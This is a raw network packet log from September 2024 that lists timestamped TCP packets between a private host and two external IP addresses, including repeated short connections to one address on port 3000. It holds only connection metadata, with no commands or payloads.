                                                Sep 26, 2024 10:58:22.441998959 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.442030907 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.442059994 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.507388115 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.507407904 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.507484913 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.507493019 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.507540941 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.508147955 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.508167028 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.508213043 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.508219957 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.508266926 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.508553982 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.508620977 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.508625984 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.508980036 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.509040117 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.509044886 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.509782076 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.509799957 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.509859085 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.509866953 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.510365009 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.510380030 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.510422945 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.510430098 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.510472059 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.531482935 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.531502962 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.531634092 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.531647921 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.532490969 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.532510042 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.532581091 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.532589912 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.532998085 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.533019066 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.533061981 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.533068895 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.533096075 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.578169107 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.598162889 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.598196983 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.598303080 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.598316908 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.598366976 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.598701000 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.598720074 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.598771095 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.598778963 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.598822117 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.598972082 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.599041939 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.599047899 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.599149942 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.599210024 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.599216938 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.599817991 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.599842072 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.599874973 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.599881887 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.599916935 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.600425959 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.600441933 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.600501060 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.600508928 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.622968912 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.622988939 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.623091936 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.623100042 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.623475075 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.623490095 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.623543024 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.623549938 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.624183893 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.624202013 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.624270916 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.624279022 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.671901941 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.689660072 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.689671040 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.689733982 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.689766884 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.689779043 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.689805031 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.689805984 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.689840078 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.690124989 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.690140963 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.690193892 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.690202951 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.690246105 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.690695047 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.690711021 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.690757036 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.690762997 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.690798998 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.690824986 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.691435099 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.691461086 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.691534996 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.691541910 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.691550970 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.691587925 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.691687107 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.691740990 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.691776991 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.691781998 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.691819906 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.691848993 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.712745905 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.712771893 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.712954044 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.712981939 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.713033915 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.713954926 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.713973045 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.714040041 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.714049101 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.714092970 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.714539051 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.714557886 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.714601040 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.714607000 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.714637041 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.714658022 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.779660940 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.779692888 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.779819012 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.779834032 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.779879093 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.780009985 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.780030966 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.780075073 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.780082941 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.780117035 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.780147076 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.783278942 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.783325911 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.783359051 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.783365011 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.783397913 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.783401966 CEST44349704188.114.97.3192.168.2.7
                                                Sep 26, 2024 10:58:22.783420086 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.783444881 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:22.783988953 CEST49704443192.168.2.7188.114.97.3
                                                Sep 26, 2024 10:58:26.296811104 CEST617433000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:26.301645041 CEST300061743191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:26.301726103 CEST617433000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:26.305933952 CEST617433000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:26.310769081 CEST300061743191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:27.925889015 CEST300061743191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:27.926779032 CEST617433000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:27.926816940 CEST617433000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:27.931799889 CEST300061743191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:28.947515011 CEST617483000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:28.952608109 CEST300061748191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:28.952683926 CEST617483000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:28.954994917 CEST617483000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:28.959803104 CEST300061748191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:30.583929062 CEST300061748191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:30.584114075 CEST617483000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:30.584114075 CEST617483000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:30.588942051 CEST300061748191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:31.595196009 CEST617513000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:31.600390911 CEST300061751191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:31.600461960 CEST617513000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:31.600967884 CEST617513000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:31.605942965 CEST300061751191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:33.238770008 CEST300061751191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:33.238838911 CEST617513000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:33.238903999 CEST617513000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:33.243674994 CEST300061751191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:34.254062891 CEST617523000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:34.260065079 CEST300061752191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:34.260273933 CEST617523000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:34.260627031 CEST617523000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:34.265623093 CEST300061752191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:35.937586069 CEST300061752191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:35.937719107 CEST617523000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:35.937786102 CEST617523000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:35.942672968 CEST300061752191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:36.954651117 CEST617533000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:36.959536076 CEST300061753191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:36.959631920 CEST617533000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:36.960220098 CEST617533000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:36.964965105 CEST300061753191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:38.605169058 CEST300061753191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:38.605288029 CEST617533000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:38.605344057 CEST617533000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:38.610234022 CEST300061753191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:39.610497952 CEST617543000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:39.615653992 CEST300061754191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:39.615745068 CEST617543000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:39.616274118 CEST617543000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:39.621854067 CEST300061754191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:41.239343882 CEST300061754191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:41.239466906 CEST617543000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:41.239522934 CEST617543000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:41.244394064 CEST300061754191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:42.251682043 CEST617553000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:42.256582022 CEST300061755191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:42.256702900 CEST617553000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:42.257210970 CEST617553000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:42.262614012 CEST300061755191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:43.885252953 CEST300061755191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:43.885483027 CEST617553000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:43.885579109 CEST617553000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:43.890686035 CEST300061755191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:44.892138004 CEST617563000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:44.897864103 CEST300061756191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:44.897957087 CEST617563000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:44.898365974 CEST617563000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:44.903857946 CEST300061756191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:46.521986008 CEST300061756191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:46.522140980 CEST617563000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:46.522197008 CEST617563000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:46.527057886 CEST300061756191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:47.532958984 CEST617573000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:47.537875891 CEST300061757191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:47.537992954 CEST617573000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:47.538382053 CEST617573000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:47.543195963 CEST300061757191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:49.178029060 CEST300061757191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:49.178088903 CEST617573000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:49.178131104 CEST617573000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:49.182987928 CEST300061757191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:50.188828945 CEST617583000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:50.193721056 CEST300061758191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:50.193834066 CEST617583000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:50.194233894 CEST617583000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:50.199007034 CEST300061758191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:51.839267969 CEST300061758191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:51.839518070 CEST617583000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:51.839581013 CEST617583000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:51.844367981 CEST300061758191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:52.845765114 CEST617593000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:52.850663900 CEST300061759191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:52.850795984 CEST617593000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:52.851325035 CEST617593000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:52.856136084 CEST300061759191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:54.475562096 CEST300061759191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:54.475682020 CEST617593000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:54.480005980 CEST617593000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:54.484743118 CEST300061759191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:55.485884905 CEST617603000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:55.491041899 CEST300061760191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:55.491130114 CEST617603000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:55.491509914 CEST617603000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:55.496295929 CEST300061760191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:57.164701939 CEST300061760191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:57.164783001 CEST617603000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:57.164838076 CEST617603000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:57.169845104 CEST300061760191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:58.173305035 CEST617613000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:58.178272009 CEST300061761191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:58.178370953 CEST617613000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:58.178797007 CEST617613000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:58.183558941 CEST300061761191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:59.947421074 CEST300061761191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:58:59.947551966 CEST617613000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:59.947613955 CEST617613000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:58:59.952613115 CEST300061761191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:00.954441071 CEST617623000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:00.959295988 CEST300061762191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:00.959377050 CEST617623000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:00.959745884 CEST617623000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:00.964543104 CEST300061762191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:02.601347923 CEST300061762191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:02.601489067 CEST617623000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:02.601571083 CEST617623000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:02.606410980 CEST300061762191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:03.610820055 CEST617633000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:03.615741014 CEST300061763191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:03.615833998 CEST617633000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:03.616377115 CEST617633000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:03.621167898 CEST300061763191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:05.255271912 CEST300061763191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:05.255379915 CEST617633000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:05.255434990 CEST617633000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:05.260318995 CEST300061763191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:06.267235994 CEST617643000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:06.272160053 CEST300061764191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:06.272264004 CEST617643000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:06.272809029 CEST617643000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:06.277764082 CEST300061764191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:07.930043936 CEST300061764191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:07.930105925 CEST617643000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:07.930177927 CEST617643000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:07.934998035 CEST300061764191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:08.938932896 CEST617663000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:08.943931103 CEST300061766191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:08.944034100 CEST617663000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:08.944473982 CEST617663000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:08.949990988 CEST300061766191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:10.702225924 CEST300061766191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:10.702347994 CEST617663000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:10.702347994 CEST617663000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:10.707130909 CEST300061766191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:11.704503059 CEST617693000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:11.709441900 CEST300061769191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:11.709563971 CEST617693000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:11.710059881 CEST617693000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:11.714947939 CEST300061769191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:13.356504917 CEST300061769191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:13.356669903 CEST617693000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:13.356760025 CEST617693000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:13.361670017 CEST300061769191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:14.360569954 CEST617703000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:14.365607023 CEST300061770191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:14.365689993 CEST617703000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:14.366074085 CEST617703000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:14.370932102 CEST300061770191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:16.131819010 CEST300061770191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:16.131891012 CEST617703000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:16.131944895 CEST617703000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:16.138818026 CEST300061770191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:17.141802073 CEST617713000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:17.146852016 CEST300061771191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:17.146949053 CEST617713000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:17.147378922 CEST617713000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:17.152174950 CEST300061771191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:18.791570902 CEST300061771191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:18.791655064 CEST617713000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:18.791721106 CEST617713000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:18.796600103 CEST300061771191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:19.798460007 CEST617723000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:19.803507090 CEST300061772191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:19.803580046 CEST617723000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:19.804095984 CEST617723000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:19.808872938 CEST300061772191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:21.429939032 CEST300061772191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:21.430207014 CEST617723000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:21.430207014 CEST617723000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:21.435131073 CEST300061772191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:22.440651894 CEST617733000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:22.446716070 CEST300061773191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:22.446810961 CEST617733000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:22.447336912 CEST617733000192.168.2.7191.93.114.27
